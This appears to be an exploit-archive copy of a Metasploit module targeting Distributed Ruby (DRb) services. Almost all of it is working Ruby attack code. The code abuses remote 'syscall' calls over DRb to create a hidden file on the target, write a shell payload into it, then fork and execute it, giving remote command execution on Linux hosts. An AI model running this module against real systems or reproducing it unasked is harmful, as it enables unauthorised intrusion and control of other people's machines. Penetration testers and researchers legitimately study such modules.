ExploitFixes
Distributed Ruby send syscall vulnerability 2011-03-23 10:15:16

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'
require 'drb/drb'
class Metasploit3 < Msf::Exploit::Remote

def initialize(info = {})
super(update_info(info,
'Name' => 'Distributed Ruby send syscall vulnerability.',
'Description' => %q{ This module exploits remote syscalls in DRuby
},
'Author' => [ 'joernchen <[email protected]> (Phenoelit)' ],
'License' => MSF_LICENSE,
'Version' => '',
'References' =>
[
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
},
'Space' => 32768,
},
'Platform' => 'linux',
'Arch' => ARCH_ALL,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0))


register_options(
[
OptString.new('URI', [true, "The druby URI of the target host ", ""]),
], self.class)
end

def exploit
serveruri = datastore['URI']
DRb.start_service
p = DRbObject.new_with_uri(serveruri)
class << p
undef :send
end
filename = "." + Rex::Text.rand_text_alphanumeric(16)
# syscall open
i = p.send(:syscall,8,filename,0700)
#syscall write
p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
#syscall close
p.send(:syscall,6,i)
#syscall fork
p.send(:syscall,2)
#syscall execve
p.send(:syscall,11,filename,0,0)

handler(nil)
end
end